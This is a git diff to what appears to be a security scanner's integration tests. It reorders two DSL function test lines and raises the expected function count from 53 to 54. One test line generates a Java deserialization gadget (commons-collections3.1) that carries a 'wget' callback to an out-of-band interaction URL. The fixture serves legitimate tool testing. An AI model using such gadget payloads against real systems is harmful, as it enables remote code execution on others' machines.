diff --git a/integration_tests/http/dsl-functions.yaml b/integration_tests/http/dsl-functions.yaml index 5d7c1847..f52a3b80 100644 --- a/integration_tests/http/dsl-functions.yaml +++ b/integration_tests/http/dsl-functions.yaml @@ -14,8 +14,8 @@ requests: 02: {{base64(1234)}} 03: {{base64_decode("SGVsbG8=")}} 04: {{base64_py("Hello")}} - 05: {{contains("Hello", "lo")}} - 06: {{concat("Hello", "world")}} + 05: {{concat("Hello", "world")}} + 06: {{contains("Hello", "lo")}} 07: {{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}} 08: {{gzip("Hello")}} 09: {{hex_decode("6161")}} diff --git a/v2/cmd/integration-test/http.go b/v2/cmd/integration-test/http.go index a95cea55..e69c8f36 100644 --- a/v2/cmd/integration-test/http.go +++ b/v2/cmd/integration-test/http.go @@ -224,7 +224,7 @@ func (h *httpDSLFunctions) Execute(filePath string) error { } totalExtracted := strings.Split(submatch[1], ",") - numberOfDslFunctions := 53 + numberOfDslFunctions := 54 if len(totalExtracted) != numberOfDslFunctions { return errors.New("incorrect number of results") }